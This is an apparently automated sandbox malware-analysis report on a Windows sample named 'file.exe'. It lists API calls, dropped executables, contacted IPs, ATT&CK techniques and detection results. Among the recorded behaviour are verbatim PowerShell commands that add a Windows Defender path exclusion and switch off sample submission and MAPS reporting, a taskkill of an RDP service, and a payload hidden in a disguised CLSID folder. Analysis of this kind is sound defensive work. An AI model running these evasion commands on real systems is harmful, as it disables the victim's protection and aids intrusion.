Source: file.exe, 00000001.00000002.2975102593.00000000011AA000.00000004.00000020.00020000.00000000.sdmp, dx4w727xyq6q2yaxja.exe, 0000000C.00000002.2030990176.00000225F0D18000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.1978232330.000001FC7A52C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: main.exe, 00000017.00000002.2976072841.000001FC7A517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll33
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeAPI call chain: ExitProcess graph end nodegraph_23-58059
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFBFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,5_2_00007FF73AFBFF1F
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB8CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,5_2_00007FF73AFB8CFC
Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,5_2_00007FF73AFB1131
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFCB6A0 SetUnhandledExceptionFilter,5_2_00007FF73AFCB6A0
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFC05D9 SetUnhandledExceptionFilter,5_2_00007FF73AFC05D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FF6EF651131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,23_2_00007FF6EF651131

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,5_2_00007FF73AFB292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exeCode function: 5_2_00007FF73AFB6FD5 GetSystemTimeAsFileTime,5_2_00007FF73AFB6FD5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E136DA3 LocalAlloc,wcsncpy,LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LookupAccountNameW,LocalFree,GetLastError,ConvertSidToStringSidA,GetLastError,wcslen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,NetApiBufferFree,NetUserEnum,GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,23_2_00007FFE0E136DA3
Source: C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 3lp16vmh8u8y3z1y6.exe, 00000005.00000002.1778189859.0000021A43CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E1358DA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE0E1358DA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0E16AEAA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE0E16AEAA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE0EB41F9A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE0EB41F9A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE11EC418A socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE11EC418A
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE126D15FA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE126D15FA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE133828BA socket,htonl,htons,bind,listen,WSAGetLastError,WSAGetLastError,WSAGetLastError,23_2_00007FFE133828BA
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1339B820 listen,htons,recv,select,23_2_00007FFE1339B820
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 23_2_00007FFE1339B7E8 bind,23_2_00007FFE1339B7E8
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
1
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
11
Disable or Modify Tools
1
Network Sniffing
1
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API
1
DLL Side-Loading
2
Valid Accounts
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop ProtocolData from Removable Media1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter
1
Create Account
2
Access Token Manipulation
2
Obfuscated Files or Information
Security Account Manager1
System Service Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
Service Execution
2
Valid Accounts
4
Windows Service
1
Timestomp
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture1
Proxy
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchd4
Windows Service
11
Process Injection
1
DLL Side-Loading
LSA Secrets1
Network Sniffing
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
Services File Permissions Weakness
1
Services File Permissions Weakness
1
File Deletion
Cached Domain Credentials24
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Masquerading
DCSync1
Network Share Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Valid Accounts
Proc Filesystem121
Security Software Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
Access Token Manipulation
/etc/passwd and /etc/shadow21
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
Virtualization/Sandbox Evasion
Network Sniffing2
Process Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection
Input Capture1
Application Window Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
Hidden Users
Keylogging1
System Owner/User Discovery
Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
Services File Permissions Weakness
GUI Input Capture1
System Network Configuration Discovery
Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1516963 Sample: file.exe Startdate: 24/09/2024 Architecture: WINDOWS Score: 96 80 NDIS Filter Driver detected (likely used to intercept and sniff network traffic) 2->80 82 Contains functionality to hide user accounts 2->82 84 Connects to many ports of the same IP (likely port scanning) 2->84 86 6 other signatures 2->86 8 main.exe 2->8         started        13 file.exe 3 2->13         started        15 file.exe 2->15         started        process3 dnsIp4 72 70.113.162.253 TWC-11427-TEXASUS United States 8->72 74 85.239.52.241 RAINBOW-HKRainbownetworklimitedHK Russian Federation 8->74 78 55 other IPs or domains 8->78 58 C:\Windows\Temp\zFE1sfMY, PE32+ 8->58 dropped 60 C:\Windows\Temp\zCUeqzwC, PE32+ 8->60 dropped 62 C:\Windows\Temp\kInii6kX, PE32+ 8->62 dropped 70 19 other files (17 malicious) 8->70 dropped 98 Contains functionality to hide user accounts 8->98 100 Found Tor onion address 8->100 76 64.95.13.143, 1120, 49730 BRAHMAN-NYUS United States 13->76 64 C:\Users\user\...\dx4w727xyq6q2yaxja.exe, PE32+ 13->64 dropped 66 C:\Users\user\...\3lp16vmh8u8y3z1y6.exe, PE32+ 13->66 dropped 68 C:\Users\user\...\tskowkhh962esyo3x0.bat, DOS 13->68 dropped 17 dx4w727xyq6q2yaxja.exe 10 13->17         started        21 cmd.exe 1 13->21         started        23 3lp16vmh8u8y3z1y6.exe 3 13->23         started        file5 signatures6 process7 file8 56 C:\Users\Public\...\main.exe, PE32+ 17->56 dropped 88 Multi AV Scanner detection for dropped file 17->88 90 Contains functionality to hide user accounts 17->90 92 Machine Learning detection for dropped file 17->92 94 Found Tor onion address 17->94 25 taskkill.exe 1 17->25         started        27 sc.exe 1 17->27         started        29 sc.exe 17->29         started        40 4 other processes 17->40 96 Adds a directory exclusion to Windows Defender 21->96 31 powershell.exe 23 21->31         started        34 powershell.exe 23 21->34         started        36 powershell.exe 23 21->36         started        38 conhost.exe 21->38         started        signatures9 process10 signatures11 42 conhost.exe 25->42         started        44 conhost.exe 27->44         started        46 conhost.exe 29->46         started        102 Loading BitLocker PowerShell Module 31->102 48 conhost.exe 40->48         started        50 conhost.exe 40->50         started        52 conhost.exe 40->52         started        54 conhost.exe 40->54         started        process12

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe3%ReversingLabs
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\dx4w727xyq6q2yaxja.exe100%Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll0%ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll0%ReversingLabs
